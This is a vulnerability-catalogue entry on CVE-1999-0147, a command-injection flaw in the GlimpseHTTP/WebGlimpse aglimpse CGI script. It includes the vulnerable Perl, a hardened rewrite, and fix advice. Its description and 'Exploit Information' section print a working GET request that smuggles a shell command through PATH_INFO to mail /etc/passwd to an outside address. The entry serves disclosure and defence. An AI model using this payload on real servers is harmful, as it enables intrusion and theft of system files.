AGlimpse

Vulnerability Description

Brief description: The GlimpseHTTP package does not check its input adequately, allowing users to insert metacharacters to force remote execution of a command.

Full description: These packages are popular collections of tools that provide an easy-to-use interface to Glimpse, an indexing and query system, in order to offer a search facility on web sites. Due to insufficient argument checking in some GlimpseHTTP and WebGlimpse (before version 1.5) routines, intruders may be able to force them to execute arbitrary commands with the privileges of the httpd(8) process.

The code is as follows:

$path_info = $ENV{'PATH_INFO'};
$_ = $path_info;

# /<length>/$indexdir/$path is the format of the PATH_INFO

# might as well start the message now
print "Content-type: text/html\n\n";
print "<HTML>\n"; print "<HEAD>\n";

if ( m|^/([0-9]*)(.*)$| ) {
        $length = $1;
        $path = $2;
        $path =~ s|"||g;
} else {
        &err_badargs;
}

$indexdir = substr($path,0,$length);
$relpath = substr($path,$length,length($path));

# print "<br>indexdir=$indexdir<br>relpath=$relpath<br>";

open(CONF,"$indexdir/archive.cfg") || &err_conf;

Note that this splits PATH_INFO in two fields, $length and $path, and then takes the first $length characters from $path and puts them in $indexdir. The last line opens $indexdir/archive.cfg.

By setting $indexdir to a string that begins with '|', the system will execute whatever it finds after the pipe, giving it as STDIN what you write to the CONF handle. If $indexdir is set to something like

|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo

it will execute the command in CMD using IFS as the separator. The one above sends the remote user the /etc/passwd file from the host on which the web server is running. (The trailing echo(1) is used to ignore the rest of the string.)
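A hardened version of the PATH_INFO handling shown above, written here as an added example (it is not code from GlimpseHTTP or WebGlimpse); the $INDEX_ROOT location is an assumption:

```perl
#!/usr/bin/perl
# Added example, not GlimpseHTTP/WebGlimpse code: hardened PATH_INFO handling.
# Assumption: every legitimate index directory lives below $INDEX_ROOT (hypothetical).
use strict;
use warnings;
use Cwd qw(realpath);

my $INDEX_ROOT = '/usr/local/glimpse/indexes';

# Split "/<length><path>" as the original does, but reject anything malformed
# instead of falling through with undefined values.
sub parse_path_info {
    my ($path_info) = @_;
    return unless defined $path_info && $path_info =~ m{^/([0-9]+)(/.*)$};
    my ($length, $path) = ($1, $2);
    return if $length > length($path);
    return (substr($path, 0, $length), substr($path, $length));
}

# Accept $indexdir only if it is plain path characters, has no "..", and
# resolves to a real directory under $INDEX_ROOT. A value such as "|IFS=5;..."
# fails the allowlist and is never handed to open() at all.
sub safe_indexdir {
    my ($indexdir) = @_;
    return unless $indexdir =~ m{^[A-Za-z0-9_./-]+$};
    return if $indexdir =~ m{(^|/)\.\.(/|$)};
    my $real = realpath($indexdir);
    return unless defined $real && -d $real;
    return unless $real eq $INDEX_ROOT || index($real, "$INDEX_ROOT/") == 0;
    return $real;
}

# Three-argument open with an explicit '<' mode: Perl treats the third argument
# purely as a file name, so a leading '|' could not start a command even if the
# allowlist above were loosened later.
sub open_archive_cfg {
    my ($indexdir) = @_;
    my $dir = safe_indexdir($indexdir) or return;
    open(my $conf, '<', "$dir/archive.cfg") or return;
    return $conf;
}

my ($indexdir, $relpath) = parse_path_info($ENV{PATH_INFO});
my $conf = defined $indexdir ? open_archive_cfg($indexdir) : undef;
print "Content-type: text/html\n\n";
if (!$conf) {
    print "<HTML><HEAD></HEAD><BODY>Bad arguments</BODY></HTML>\n";
    exit 0;
}
```

With this structure the request from the exploit description fails at parse_path_info (the character after the length is not '/'), and any value that did reach open() would be treated as a file name, not a pipe.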

Components: GlimpseHTTP WebGlimpse

Systems: independent of OS

Effect(s) of exploiting: Can execute programs on web server with privileges of web server program

Detecting the hole:

    1. Check for the above code in your WebGlimpse or GlimpseHTTP program.

Fixing the hole:

    1. You need to get rid of the offending programs.
    2. Disable GlimpseHTTP and WebGlimpse.
    3. Upgrade to WebGlimpse version 1.5 or later. GlimpseHTTP is no longer supported.

Other information:

Keywords

metacharacter

Cataloguing

PA Classification(s):

RISOS Classification(s):

DCS Classification(s):

CVE Number: CVE-1999-0147 -- The aglimpse CGI program of the Glimpse package allows remote execution of arbitrary commands

Exploit Information

Attack: Telnet to the target machine's web server and enter the following:

GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo

Note that the cgi-bin directory could be located somewhere else (for example in /scripts or /cgi). Make the obvious change if this is so.

Related Information

The Project FUSE web site has a page about GlimpseHTTP security. CERT Advisory CA-97.25.CGI_metachar, Sanitizing User-Supplied Data in CGI Scripts has general advice on sanitizing user input for CGI scripts that is relevant.

Advisories: ISS X-Force database entry http-cgi-glimpse; CERT Vendor-initiated bulletin VB-97.13, Vulnerability in GlimpseHTTP and WebGlimpse CGI scripts from Project FUSE

Related Vulnerabilities:

Reportage

Reporting: Razvan Dragomirescu in Bugtraq (Wed Jul 02 1997 19:32:09)

Revision Number 1

  1. Stacey Anderson (6/26/2000):
    Initial entry